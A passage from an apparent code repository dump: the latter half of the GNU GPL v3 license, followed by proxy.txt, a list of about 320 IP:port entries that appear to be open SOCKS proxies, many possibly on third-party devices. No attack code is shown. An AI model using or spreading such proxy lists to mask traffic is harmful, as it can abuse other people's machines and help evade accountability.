definition files associated with source files for 142 | the work, and the source code for shared libraries and dynamically 143 | linked subprograms that the work is specifically designed to require, 144 | such as by intimate data communication or control flow between those 145 | subprograms and other parts of the work. 146 | 147 | The Corresponding Source need not include anything that users 148 | can regenerate automatically from other parts of the Corresponding 149 | Source. 150 | 151 | The Corresponding Source for a work in source code form is that 152 | same work. 153 | 154 | 2. Basic Permissions. 155 | 156 | All rights granted under this License are granted for the term of 157 | copyright on the Program, and are irrevocable provided the stated 158 | conditions are met. This License explicitly affirms your unlimited 159 | permission to run the unmodified Program. The output from running a 160 | covered work is covered by this License only if the output, given its 161 | content, constitutes a covered work. This License acknowledges your 162 | rights of fair use or other equivalent, as provided by copyright law. 163 | 164 | You may make, run and propagate covered works that you do not 165 | convey, without conditions so long as your license otherwise remains 166 | in force. You may convey covered works to others for the sole purpose 167 | of having them make modifications exclusively for you, or provide you 168 | with facilities for running those works, provided that you comply with 169 | the terms of this License in conveying all material for which you do 170 | not control copyright. Those thus making or running the covered works 171 | for you must do so exclusively on your behalf, under your direction 172 | and control, on terms that prohibit them from making any copies of 173 | your copyrighted material outside their relationship with you. 174 | 175 | Conveying under any other circumstances is permitted solely under 176 | the conditions stated below. Sublicensing is not allowed; section 10 177 | makes it unnecessary. 178 | 179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 180 | 181 | No covered work shall be deemed part of an effective technological 182 | measure under any applicable law fulfilling obligations under article 183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or 184 | similar laws prohibiting or restricting circumvention of such 185 | measures. 186 | 187 | When you convey a covered work, you waive any legal power to forbid 188 | circumvention of technological measures to the extent such circumvention 189 | is effected by exercising rights under this License with respect to 190 | the covered work, and you disclaim any intention to limit operation or 191 | modification of the work as a means of enforcing, against the work's 192 | users, your or third parties' legal rights to forbid circumvention of 193 | technological measures. 194 | 195 | 4. Conveying Verbatim Copies. 196 | 197 | You may convey verbatim copies of the Program's source code as you 198 | receive it, in any medium, provided that you conspicuously and 199 | appropriately publish on each copy an appropriate copyright notice; 200 | keep intact all notices stating that this License and any 201 | non-permissive terms added in accord with section 7 apply to the code; 202 | keep intact all notices of the absence of any warranty; and give all 203 | recipients a copy of this License along with the Program. 204 | 205 | You may charge any price or no price for each copy that you convey, 206 | and you may offer support or warranty protection for a fee. 207 | 208 | 5. Conveying Modified Source Versions. 209 | 210 | You may convey a work based on the Program, or the modifications to 211 | produce it from the Program, in the form of source code under the 212 | terms of section 4, provided that you also meet all of these conditions: 213 | 214 | a) The work must carry prominent notices stating that you modified 215 | it, and giving a relevant date. 216 | 217 | b) The work must carry prominent notices stating that it is 218 | released under this License and any conditions added under section 219 | 7. This requirement modifies the requirement in section 4 to 220 | "keep intact all notices". 221 | 222 | c) You must license the entire work, as a whole, under this 223 | License to anyone who comes into possession of a copy. This 224 | License will therefore apply, along with any applicable section 7 225 | additional terms, to the whole of the work, and all its parts, 226 | regardless of how they are packaged. This License gives no 227 | permission to license the work in any other way, but it does not 228 | invalidate such permission if you have separately received it. 229 | 230 | d) If the work has interactive user interfaces, each must display 231 | Appropriate Legal Notices; however, if the Program has interactive 232 | interfaces that do not display Appropriate Legal Notices, your 233 | work need not make them do so. 234 | 235 | A compilation of a covered work with other separate and independent 236 | works, which are not by their nature extensions of the covered work, 237 | and which are not combined with it such as to form a larger program, 238 | in or on a volume of a storage or distribution medium, is called an 239 | "aggregate" if the compilation and its resulting copyright are not 240 | used to limit the access or legal rights of the compilation's users 241 | beyond what the individual works permit. Inclusion of a covered work 242 | in an aggregate does not cause this License to apply to the other 243 | parts of the aggregate. 244 | 245 | 6. Conveying Non-Source Forms. 246 | 247 | You may convey a covered work in object code form under the terms 248 | of sections 4 and 5, provided that you also convey the 249 | machine-readable Corresponding Source under the terms of this License, 250 | in one of these ways: 251 | 252 | a) Convey the object code in, or embodied in, a physical product 253 | (including a physical distribution medium), accompanied by the 254 | Corresponding Source fixed on a durable physical medium 255 | customarily used for software interchange. 256 | 257 | b) Convey the object code in, or embodied in, a physical product 258 | (including a physical distribution medium), accompanied by a 259 | written offer, valid for at least three years and valid for as 260 | long as you offer spare parts or customer support for that product 261 | model, to give anyone who possesses the object code either (1) a 262 | copy of the Corresponding Source for all the software in the 263 | product that is covered by this License, on a durable physical 264 | medium customarily used for software interchange, for a price no 265 | more than your reasonable cost of physically performing this 266 | conveying of source, or (2) access to copy the 267 | Corresponding Source from a network server at no charge. 268 | 269 | c) Convey individual copies of the object code with a copy of the 270 | written offer to provide the Corresponding Source. This 271 | alternative is allowed only occasionally and noncommercially, and 272 | only if you received the object code with such an offer, in accord 273 | with subsection 6b. 274 | 275 | d) Convey the object code by offering access from a designated 276 | place (gratis or for a charge), and offer equivalent access to the 277 | Corresponding Source in the same way through the same place at no 278 | further charge. You need not require recipients to copy the 279 | Corresponding Source along with the object code. If the place to 280 | copy the object code is a network server, the Corresponding Source 281 | may be on a different server (operated by you or a third party) 282 | that supports equivalent copying facilities, provided you maintain 283 | clear directions next to the object code saying where to find the 284 | Corresponding Source. Regardless of what server hosts the 285 | Corresponding Source, you remain obligated to ensure that it is 286 | available for as long as needed to satisfy these requirements. 287 | 288 | e) Convey the object code using peer-to-peer transmission, provided 289 | you inform other peers where the object code and Corresponding 290 | Source of the work are being offered to the general public at no 291 | charge under subsection 6d. 292 | 293 | A separable portion of the object code, whose source code is excluded 294 | from the Corresponding Source as a System Library, need not be 295 | included in conveying the object code work. 296 | 297 | A "User Product" is either (1) a "consumer product", which means any 298 | tangible personal property which is normally used for personal, family, 299 | or household purposes, or (2) anything designed or sold for incorporation 300 | into a dwelling. In determining whether a product is a consumer product, 301 | doubtful cases shall be resolved in favor of coverage. For a particular 302 | product received by a particular user, "normally used" refers to a 303 | typical or common use of that class of product, regardless of the status 304 | of the particular user or of the way in which the particular user 305 | actually uses, or expects or is expected to use, the product. A product 306 | is a consumer product regardless of whether the product has substantial 307 | commercial, industrial or non-consumer uses, unless such uses represent 308 | the only significant mode of use of the product. 309 | 310 | "Installation Information" for a User Product means any methods, 311 | procedures, authorization keys, or other information required to install 312 | and execute modified versions of a covered work in that User Product from 313 | a modified version of its Corresponding Source. The information must 314 | suffice to ensure that the continued functioning of the modified object 315 | code is in no case prevented or interfered with solely because 316 | modification has been made. 317 | 318 | If you convey an object code work under this section in, or with, or 319 | specifically for use in, a User Product, and the conveying occurs as 320 | part of a transaction in which the right of possession and use of the 321 | User Product is transferred to the recipient in perpetuity or for a 322 | fixed term (regardless of how the transaction is characterized), the 323 | Corresponding Source conveyed under this section must be accompanied 324 | by the Installation Information. But this requirement does not apply 325 | if neither you nor any third party retains the ability to install 326 | modified object code on the User Product (for example, the work has 327 | been installed in ROM). 328 | 329 | The requirement to provide Installation Information does not include a 330 | requirement to continue to provide support service, warranty, or updates 331 | for a work that has been modified or installed by the recipient, or for 332 | the User Product in which it has been modified or installed. Access to a 333 | network may be denied when the modification itself materially and 334 | adversely affects the operation of the network or violates the rules and 335 | protocols for communication across the network. 336 | 337 | Corresponding Source conveyed, and Installation Information provided, 338 | in accord with this section must be in a format that is publicly 339 | documented (and with an implementation available to the public in 340 | source code form), and must require no special password or key for 341 | unpacking, reading or copying. 342 | 343 | 7. Additional Terms. 344 | 345 | "Additional permissions" are terms that supplement the terms of this 346 | License by making exceptions from one or more of its conditions. 347 | Additional permissions that are applicable to the entire Program shall 348 | be treated as though they were included in this License, to the extent 349 | that they are valid under applicable law. If additional permissions 350 | apply only to part of the Program, that part may be used separately 351 | under those permissions, but the entire Program remains governed by 352 | this License without regard to the additional permissions. 353 | 354 | When you convey a copy of a covered work, you may at your option 355 | remove any additional permissions from that copy, or from any part of 356 | it. (Additional permissions may be written to require their own 357 | removal in certain cases when you modify the work.) You may place 358 | additional permissions on material, added by you to a covered work, 359 | for which you have or can give appropriate copyright permission. 360 | 361 | Notwithstanding any other provision of this License, for material you 362 | add to a covered work, you may (if authorized by the copyright holders of 363 | that material) supplement the terms of this License with terms: 364 | 365 | a) Disclaiming warranty or limiting liability differently from the 366 | terms of sections 15 and 16 of this License; or 367 | 368 | b) Requiring preservation of specified reasonable legal notices or 369 | author attributions in that material or in the Appropriate Legal 370 | Notices displayed by works containing it; or 371 | 372 | c) Prohibiting misrepresentation of the origin of that material, or 373 | requiring that modified versions of such material be marked in 374 | reasonable ways as different from the original version; or 375 | 376 | d) Limiting the use for publicity purposes of names of licensors or 377 | authors of the material; or 378 | 379 | e) Declining to grant rights under trademark law for use of some 380 | trade names, trademarks, or service marks; or 381 | 382 | f) Requiring indemnification of licensors and authors of that 383 | material by anyone who conveys the material (or modified versions of 384 | it) with contractual assumptions of liability to the recipient, for 385 | any liability that these contractual assumptions directly impose on 386 | those licensors and authors. 387 | 388 | All other non-permissive additional terms are considered "further 389 | restrictions" within the meaning of section 10. If the Program as you 390 | received it, or any part of it, contains a notice stating that it is 391 | governed by this License along with a term that is a further 392 | restriction, you may remove that term. If a license document contains 393 | a further restriction but permits relicensing or conveying under this 394 | License, you may add to a covered work material governed by the terms 395 | of that license document, provided that the further restriction does 396 | not survive such relicensing or conveying. 397 | 398 | If you add terms to a covered work in accord with this section, you 399 | must place, in the relevant source files, a statement of the 400 | additional terms that apply to those files, or a notice indicating 401 | where to find the applicable terms. 402 | 403 | Additional terms, permissive or non-permissive, may be stated in the 404 | form of a separately written license, or stated as exceptions; 405 | the above requirements apply either way. 406 | 407 | 8. Termination. 408 | 409 | You may not propagate or modify a covered work except as expressly 410 | provided under this License. Any attempt otherwise to propagate or 411 | modify it is void, and will automatically terminate your rights under 412 | this License (including any patent licenses granted under the third 413 | paragraph of section 11). 414 | 415 | However, if you cease all violation of this License, then your 416 | license from a particular copyright holder is reinstated (a) 417 | provisionally, unless and until the copyright holder explicitly and 418 | finally terminates your license, and (b) permanently, if the copyright 419 | holder fails to notify you of the violation by some reasonable means 420 | prior to 60 days after the cessation. 421 | 422 | Moreover, your license from a particular copyright holder is 423 | reinstated permanently if the copyright holder notifies you of the 424 | violation by some reasonable means, this is the first time you have 425 | received notice of violation of this License (for any work) from that 426 | copyright holder, and you cure the violation prior to 30 days after 427 | your receipt of the notice. 428 | 429 | Termination of your rights under this section does not terminate the 430 | licenses of parties who have received copies or rights from you under 431 | this License. If your rights have been terminated and not permanently 432 | reinstated, you do not qualify to receive new licenses for the same 433 | material under section 10. 434 | 435 | 9. Acceptance Not Required for Having Copies. 436 | 437 | You are not required to accept this License in order to receive or 438 | run a copy of the Program. Ancillary propagation of a covered work 439 | occurring solely as a consequence of using peer-to-peer transmission 440 | to receive a copy likewise does not require acceptance. However, 441 | nothing other than this License grants you permission to propagate or 442 | modify any covered work. These actions infringe copyright if you do 443 | not accept this License. Therefore, by modifying or propagating a 444 | covered work, you indicate your acceptance of this License to do so. 445 | 446 | 10. Automatic Licensing of Downstream Recipients. 447 | 448 | Each time you convey a covered work, the recipient automatically 449 | receives a license from the original licensors, to run, modify and 450 | propagate that work, subject to this License. You are not responsible 451 | for enforcing compliance by third parties with this License. 452 | 453 | An "entity transaction" is a transaction transferring control of an 454 | organization, or substantially all assets of one, or subdividing an 455 | organization, or merging organizations. If propagation of a covered 456 | work results from an entity transaction, each party to that 457 | transaction who receives a copy of the work also receives whatever 458 | licenses to the work the party's predecessor in interest had or could 459 | give under the previous paragraph, plus a right to possession of the 460 | Corresponding Source of the work from the predecessor in interest, if 461 | the predecessor has it or can get it with reasonable efforts. 462 | 463 | You may not impose any further restrictions on the exercise of the 464 | rights granted or affirmed under this License. For example, you may 465 | not impose a license fee, royalty, or other charge for exercise of 466 | rights granted under this License, and you may not initiate litigation 467 | (including a cross-claim or counterclaim in a lawsuit) alleging that 468 | any patent claim is infringed by making, using, selling, offering for 469 | sale, or importing the Program or any portion of it. 470 | 471 | 11. Patents. 472 | 473 | A "contributor" is a copyright holder who authorizes use under this 474 | License of the Program or a work on which the Program is based. The 475 | work thus licensed is called the contributor's "contributor version". 476 | 477 | A contributor's "essential patent claims" are all patent claims 478 | owned or controlled by the contributor, whether already acquired or 479 | hereafter acquired, that would be infringed by some manner, permitted 480 | by this License, of making, using, or selling its contributor version, 481 | but do not include claims that would be infringed only as a 482 | consequence of further modification of the contributor version. For 483 | purposes of this definition, "control" includes the right to grant 484 | patent sublicenses in a manner consistent with the requirements of 485 | this License. 486 | 487 | Each contributor grants you a non-exclusive, worldwide, royalty-free 488 | patent license under the contributor's essential patent claims, to 489 | make, use, sell, offer for sale, import and otherwise run, modify and 490 | propagate the contents of its contributor version. 491 | 492 | In the following three paragraphs, a "patent license" is any express 493 | agreement or commitment, however denominated, not to enforce a patent 494 | (such as an express permission to practice a patent or covenant not to 495 | sue for patent infringement). To "grant" such a patent license to a 496 | party means to make such an agreement or commitment not to enforce a 497 | patent against the party. 498 | 499 | If you convey a covered work, knowingly relying on a patent license, 500 | and the Corresponding Source of the work is not available for anyone 501 | to copy, free of charge and under the terms of this License, through a 502 | publicly available network server or other readily accessible means, 503 | then you must either (1) cause the Corresponding Source to be so 504 | available, or (2) arrange to deprive yourself of the benefit of the 505 | patent license for this particular work, or (3) arrange, in a manner 506 | consistent with the requirements of this License, to extend the patent 507 | license to downstream recipients. "Knowingly relying" means you have 508 | actual knowledge that, but for the patent license, your conveying the 509 | covered work in a country, or your recipient's use of the covered work 510 | in a country, would infringe one or more identifiable patents in that 511 | country that you have reason to believe are valid. 512 | 513 | If, pursuant to or in connection with a single transaction or 514 | arrangement, you convey, or propagate by procuring conveyance of, a 515 | covered work, and grant a patent license to some of the parties 516 | receiving the covered work authorizing them to use, propagate, modify 517 | or convey a specific copy of the covered work, then the patent license 518 | you grant is automatically extended to all recipients of the covered 519 | work and works based on it. 520 | 521 | A patent license is "discriminatory" if it does not include within 522 | the scope of its coverage, prohibits the exercise of, or is 523 | conditioned on the non-exercise of one or more of the rights that are 524 | specifically granted under this License. You may not convey a covered 525 | work if you are a party to an arrangement with a third party that is 526 | in the business of distributing software, under which you make payment 527 | to the third party based on the extent of your activity of conveying 528 | the work, and under which the third party grants, to any of the 529 | parties who would receive the covered work from you, a discriminatory 530 | patent license (a) in connection with copies of the covered work 531 | conveyed by you (or copies made from those copies), or (b) primarily 532 | for and in connection with specific products or compilations that 533 | contain the covered work, unless you entered into that arrangement, 534 | or that patent license was granted, prior to 28 March 2007. 535 | 536 | Nothing in this License shall be construed as excluding or limiting 537 | any implied license or other defenses to infringement that may 538 | otherwise be available to you under applicable patent law. 539 | 540 | 12. No Surrender of Others' Freedom. 541 | 542 | If conditions are imposed on you (whether by court order, agreement or 543 | otherwise) that contradict the conditions of this License, they do not 544 | excuse you from the conditions of this License. If you cannot convey a 545 | covered work so as to satisfy simultaneously your obligations under this 546 | License and any other pertinent obligations, then as a consequence you may 547 | not convey it at all. For example, if you agree to terms that obligate you 548 | to collect a royalty for further conveying from those to whom you convey 549 | the Program, the only way you could satisfy both those terms and this 550 | License would be to refrain entirely from conveying the Program. 551 | 552 | 13. Use with the GNU Affero General Public License. 553 | 554 | Notwithstanding any other provision of this License, you have 555 | permission to link or combine any covered work with a work licensed 556 | under version 3 of the GNU Affero General Public License into a single 557 | combined work, and to convey the resulting work. The terms of this 558 | License will continue to apply to the part which is the covered work, 559 | but the special requirements of the GNU Affero General Public License, 560 | section 13, concerning interaction through a network will apply to the 561 | combination as such. 562 | 563 | 14. Revised Versions of this License. 564 | 565 | The Free Software Foundation may publish revised and/or new versions of 566 | the GNU General Public License from time to time. Such new versions will 567 | be similar in spirit to the present version, but may differ in detail to 568 | address new problems or concerns. 569 | 570 | Each version is given a distinguishing version number. If the 571 | Program specifies that a certain numbered version of the GNU General 572 | Public License "or any later version" applies to it, you have the 573 | option of following the terms and conditions either of that numbered 574 | version or of any later version published by the Free Software 575 | Foundation. If the Program does not specify a version number of the 576 | GNU General Public License, you may choose any version ever published 577 | by the Free Software Foundation. 578 | 579 | If the Program specifies that a proxy can decide which future 580 | versions of the GNU General Public License can be used, that proxy's 581 | public statement of acceptance of a version permanently authorizes you 582 | to choose that version for the Program. 583 | 584 | Later license versions may give you additional or different 585 | permissions. However, no additional obligations are imposed on any 586 | author or copyright holder as a result of your choosing to follow a 587 | later version. 588 | 589 | 15. Disclaimer of Warranty. 590 | 591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY 592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT 593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY 594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, 595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR 596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM 597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF 598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 599 | 600 | 16. Limitation of Liability. 601 | 602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING 603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS 604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY 605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE 606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF 607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD 608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS), 609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF 610 | SUCH DAMAGES. 611 | 612 | 17. Interpretation of Sections 15 and 16. 613 | 614 | If the disclaimer of warranty and limitation of liability provided 615 | above cannot be given local legal effect according to their terms, 616 | reviewing courts shall apply local law that most closely approximates 617 | an absolute waiver of all civil liability in connection with the 618 | Program, unless a warranty or assumption of liability accompanies a 619 | copy of the Program in return for a fee. 620 | 621 | END OF TERMS AND CONDITIONS 622 | 623 | How to Apply These Terms to Your New Programs 624 | 625 | If you develop a new program, and you want it to be of the greatest 626 | possible use to the public, the best way to achieve this is to make it 627 | free software which everyone can redistribute and change under these terms. 628 | 629 | To do so, attach the following notices to the program. It is safest 630 | to attach them to the start of each source file to most effectively 631 | state the exclusion of warranty; and each file should have at least 632 | the "copyright" line and a pointer to where the full notice is found. 633 | 634 | 635 | Copyright (C) 636 | 637 | This program is free software: you can redistribute it and/or modify 638 | it under the terms of the GNU General Public License as published by 639 | the Free Software Foundation, either version 3 of the License, or 640 | (at your option) any later version. 641 | 642 | This program is distributed in the hope that it will be useful, 643 | but WITHOUT ANY WARRANTY; without even the implied warranty of 644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 645 | GNU General Public License for more details. 646 | 647 | You should have received a copy of the GNU General Public License 648 | along with this program. If not, see . 649 | 650 | Also add information on how to contact you by electronic and paper mail. 651 | 652 | If the program does terminal interaction, make it output a short 653 | notice like this when it starts in an interactive mode: 654 | 655 | Copyright (C) 656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'. 657 | This is free software, and you are welcome to redistribute it 658 | under certain conditions; type `show c' for details. 659 | 660 | The hypothetical commands `show w' and `show c' should show the appropriate 661 | parts of the General Public License. Of course, your program's commands 662 | might be different; for a GUI interface, you would use an "about box". 663 | 664 | You should also get your employer (if you work as a programmer) or school, 665 | if any, to sign a "copyright disclaimer" for the program, if necessary. 666 | For more information on this, and how to apply and follow the GNU GPL, see 667 | . 668 | 669 | The GNU General Public License does not permit incorporating your program 670 | into proprietary programs. If your program is a subroutine library, you 671 | may consider it more useful to permit linking proprietary applications with 672 | the library. If this is what you want to do, use the GNU Lesser General 673 | Public License instead of this License. But first, please read 674 | . -------------------------------------------------------------------------------- /proxy.txt: -------------------------------------------------------------------------------- 1 | 177.129.63.142:4153 2 | 116.0.56.34:1080 3 | 217.218.234.221:4153 4 | 91.123.22.23:4145 5 | 84.54.132.73:4145 6 | 186.64.81.3:5678 7 | 103.245.205.142:35158 8 | 46.99.161.122:5678 9 | 27.131.182.50:5678 10 | 103.143.234.249:58526 11 | 190.2.210.126:5678 12 | 95.165.163.188:36496 13 | 24.139.143.226:4153 14 | 202.70.84.201:4153 15 | 45.7.56.226:4153 16 | 72.223.168.86:57481 17 | 105.235.197.162:54066 18 | 111.90.169.178:5678 19 | 182.52.32.106:4153 20 | 203.169.27.149:5678 21 | 45.201.187.214:5678 22 | 202.43.191.10:5430 23 | 5.164.23.109:44550 24 | 202.180.55.98:5678 25 | 37.111.50.254:4153 26 | 81.91.157.134:5678 27 | 90.156.6.97:5678 28 | 180.94.64.114:5678 29 | 168.232.14.202:1080 30 | 83.103.206.56:54321 31 | 181.129.181.99:5678 32 | 47.100.9.91:7890 33 | 177.91.76.34:4153 34 | 101.51.160.77:8080 35 | 37.130.29.74:1080 36 | 27.72.59.99:5678 37 | 195.225.49.134:55774 38 | 23.82.15.52:48825 39 | 98.162.25.7:31653 40 | 85.132.8.221:4153 41 | 37.235.24.166:5678 42 | 80.191.46.59:1080 43 | 176.114.228.40:44604 44 | 103.83.252.61:1080 45 | 72.195.34.58:4145 46 | 160.226.203.247:1080 47 | 119.2.121.210:5678 48 | 36.89.10.51:44268 49 | 203.194.21.241:4153 50 | 103.214.156.32:5678 51 | 49.0.32.154:10801 52 | 103.112.244.249:4153 53 | 78.128.124.108:5678 54 | 85.185.152.146:4145 55 | 160.202.41.194:4153 56 | 192.111.135.18:18301 57 | 113.176.195.145:4153 58 | 187.87.198.250:3629 59 | 217.66.223.172:5678 60 | 181.129.147.27:37251 61 | 117.58.245.66:61393 62 | 212.156.55.34:5678 63 | 1.14.108.182:1080 64 | 213.109.235.89:4153 65 | 103.122.169.17:5678 66 | 192.111.130.5:17002 67 | 183.91.83.33:9080 68 | 61.247.5.95:4145 69 | 93.171.224.51:4153 70 | 103.221.254.12:38247 71 | 80.85.98.110:5678 72 | 5.83.104.183:4153 73 | 116.66.205.50:5678 74 | 122.55.185.226:5678 75 | 62.122.201.246:50129 76 | 123.200.19.218:5678 77 | 31.167.220.106:5678 78 | 41.191.222.26:8291 79 | 58.215.201.98:38596 80 | 103.246.2.202:5678 81 | 84.32.188.34:1157 82 | 191.103.216.42:5678 83 | 220.247.174.12:54694 84 | 43.245.243.58:5678 85 | 103.18.163.194:5678 86 | 103.60.186.21:52195 87 | 51.222.13.193:10084 88 | 183.88.237.134:5678 89 | 89.25.23.212:4153 90 | 201.251.155.253:5678 91 | 31.163.202.55:3629 92 | 217.147.92.75:52004 93 | 190.184.144.222:5678 94 | 186.224.225.98:4145 95 | 5.34.74.218:5678 96 | 103.122.84.28:5678 97 | 77.238.210.30:3629 98 | 41.162.186.2:45965 99 | 77.104.103.237:5678 100 | 211.24.105.19:53598 101 | 178.189.11.134:61039 102 | 31.15.89.51:1099 103 | 93.171.224.62:4153 104 | 103.9.134.148:5678 105 | 167.99.87.173:1080 106 | 46.225.251.206:1080 107 | 77.108.78.22:48079 108 | 200.71.193.174:5678 109 | 61.9.52.90:5678 110 | 37.131.164.102:59341 111 | 170.80.91.3:4145 112 | 202.40.186.157:4145 113 | 195.78.100.162:3629 114 | 119.57.115.57:30622 115 | 36.92.87.73:5678 116 | 181.13.132.179:5678 117 | 201.220.128.93:3000 118 | 1.179.201.189:5678 119 | 121.200.62.246:4153 120 | 192.140.91.133:5678 121 | 36.37.94.199:5678 122 | 50.236.148.246:31699 123 | 59.153.24.185:5678 124 | 159.192.121.240:4145 125 | 201.48.62.65:4145 126 | 113.160.227.247:5678 127 | 5.183.181.18:4153 128 | 80.80.162.81:10805 129 | 146.185.138.153:29628 130 | 103.75.148.17:4145 131 | 177.12.177.22:4153 132 | 202.148.26.124:5678 133 | 89.135.176.129:4153 134 | 51.75.173.161:1080 135 | 103.144.181.122:44550 136 | 109.94.101.245:5678 137 | 103.59.203.149:4145 138 | 95.182.78.2:5678 139 | 170.244.64.12:31476 140 | 43.250.127.98:4153 141 | 62.141.66.110:4145 142 | 85.91.195.229:4145 143 | 203.128.77.42:3629 144 | 109.195.215.210:4153 145 | 213.6.146.166:5678 146 | 177.141.148.120:5678 147 | 81.23.3.237:3629 148 | 97.74.230.87:45668 149 | 109.238.222.1:4153 150 | 198.199.64.196:61877 151 | 61.69.123.157:5678 152 | 187.223.168.170:4153 153 | 103.239.52.97:4153 154 | 185.43.249.132:39316 155 | 80.53.255.194:4153 156 | 103.242.104.245:5678 157 | 103.77.227.201:4153 158 | 202.77.108.242:5678 159 | 186.190.183.53:5678 160 | 91.93.143.2:4153 161 | 85.196.136.13:4153 162 | 180.211.95.14:5678 163 | 190.104.26.227:33638 164 | 186.1.181.62:4153 165 | 84.51.0.199:4145 166 | 103.139.163.219:4153 167 | 45.7.210.198:4153 168 | 36.67.147.220:4153 169 | 51.81.89.146:52987 170 | 114.33.151.164:4145 171 | 181.113.0.38:5678 172 | 191.102.82.83:4153 173 | 103.101.194.34:5430 174 | 139.5.71.243:5678 175 | 72.221.232.155:4145 176 | 115.127.121.202:5678 177 | 102.68.130.2:5678 178 | 170.246.85.107:37163 179 | 1.234.41.190:30001 180 | 119.148.103.6:4153 181 | 103.242.104.242:5678 182 | 109.69.161.131:10801 183 | 192.111.139.165:19402 184 | 190.153.225.92:4153 185 | 188.95.20.138:5678 186 | 181.15.119.210:4153 187 | 89.212.90.179:4145 188 | 45.71.219.3:5678 189 | 49.156.42.188:5678 190 | 203.170.75.14:4153 191 | 176.122.210.190:33555 192 | 211.56.15.46:59073 193 | 128.201.102.170:5678 194 | 91.83.42.1:44550 195 | 221.1.215.150:5678 196 | 45.70.30.195:5678 197 | 176.102.130.23:5678 198 | 72.49.49.11:31034 199 | 128.199.89.3:10335 200 | 181.129.134.138:5678 201 | 94.136.157.225:60030 202 | 123.203.156.224:65528 203 | 195.242.138.20:5678 204 | 85.29.144.114:5678 205 | 190.103.28.76:4145 206 | 179.108.251.41:4153 207 | 202.40.177.94:5678 208 | 103.113.3.146:4145 209 | 177.86.156.206:33756 210 | 85.29.147.90:5678 211 | 190.119.168.118:5678 212 | 212.22.79.61:5678 213 | 109.110.82.245:5678 214 | 182.93.85.49:5678 215 | 88.135.41.47:4153 216 | 104.131.67.128:9300 217 | 110.74.195.33:5678 218 | 103.233.154.21:4145 219 | 149.20.253.250:12551 220 | 93.117.72.27:55770 221 | 177.72.115.65:31164 222 | 206.189.118.100:18938 223 | 103.73.68.106:5678 224 | 89.203.129.202:4153 225 | 45.251.231.113:5678 226 | 200.170.145.9:5678 227 | 103.149.104.2:4153 228 | 177.184.67.77:4145 229 | 103.124.136.137:3128 230 | 123.231.230.58:31196 231 | 43.227.128.74:4153 232 | 103.133.26.45:5678 233 | 192.252.208.70:14282 234 | 45.118.205.204:5678 235 | 177.74.183.10:4145 236 | 185.15.103.9:5678 237 | 177.184.67.61:4145 238 | 110.44.126.221:5678 239 | 106.105.202.177:4145 240 | 103.235.199.93:5678 241 | 85.132.8.219:4153 242 | 182.93.84.22:5678 243 | 103.236.161.21:5430 244 | 196.32.236.141:5678 245 | 181.197.199.216:5678 246 | 45.7.247.188:4153 247 | 41.79.236.164:1080 248 | 117.28.254.143:4145 249 | 137.184.131.165:9300 250 | 91.241.167.134:5678 251 | 183.88.212.247:1080 252 | 189.220.227.6:5678 253 | 222.124.135.123:5678 254 | 195.177.217.131:35334 255 | 88.255.102.20:1080 256 | 82.103.116.126:4153 257 | 195.177.217.131:18059 258 | 120.88.34.92:5678 259 | 91.210.47.85:30806 260 | 36.66.192.35:38420 261 | 103.51.44.221:4145 262 | 103.109.56.249:1080 263 | 113.74.26.114:4145 264 | 200.46.203.42:5678 265 | 202.137.141.212:5678 266 | 165.90.89.6:5678 267 | 167.179.6.66:5678 268 | 36.37.92.1:4153 269 | 1.32.57.85:5678 270 | 154.79.248.156:5678 271 | 187.120.241.81:3629 272 | 94.181.174.77:4153 273 | 13.59.58.111:1080 274 | 185.66.57.106:42647 275 | 80.122.144.182:5678 276 | 178.134.153.205:14888 277 | 178.151.134.232:5678 278 | 202.169.49.218:5678 279 | 84.54.132.15:4145 280 | 213.250.198.66:4145 281 | 98.162.96.52:4145 282 | 203.223.41.34:45717 283 | 186.211.105.202:43573 284 | 151.0.173.145:59729 285 | 109.122.80.234:57553 286 | 91.223.32.102:4153 287 | 118.186.17.243:36487 288 | 43.231.78.97:4145 289 | 202.124.46.101:4145 290 | 174.77.111.196:4145 291 | 165.22.214.24:28704 292 | 144.48.108.202:1080 293 | 37.130.4.43:5678 294 | 103.194.242.254:40247 295 | 202.60.225.49:56894 296 | 114.69.243.97:4145 297 | 124.41.240.53:5678 298 | 203.76.109.178:4145 299 | 189.2.164.165:4153 300 | 154.120.133.190:30303 301 | 190.124.16.81:5678 302 | 202.51.178.57:5678 303 | 72.221.172.203:4145 304 | 177.229.203.94:5678 305 | 217.147.92.74:52004 306 | 221.121.12.238:47012 307 | 202.163.113.240:1080 308 | 177.66.56.120:4153 309 | 46.35.249.189:49795 310 | 46.149.34.206:3629 311 | 46.141.57.116:1080 312 | 98.162.25.4:31654 313 | 107.21.38.230:9050 314 | 190.119.186.93:5678 315 | 46.29.118.215:4153 316 | 178.62.79.49:35269 317 | 197.210.217.66:60896 318 | 150.129.109.14:5678 319 | 84.236.185.247:61710 320 | 113.160.16.142:5678 321 | 46.188.82.63:4153 322 | 5.83.104.144:4153 323 | 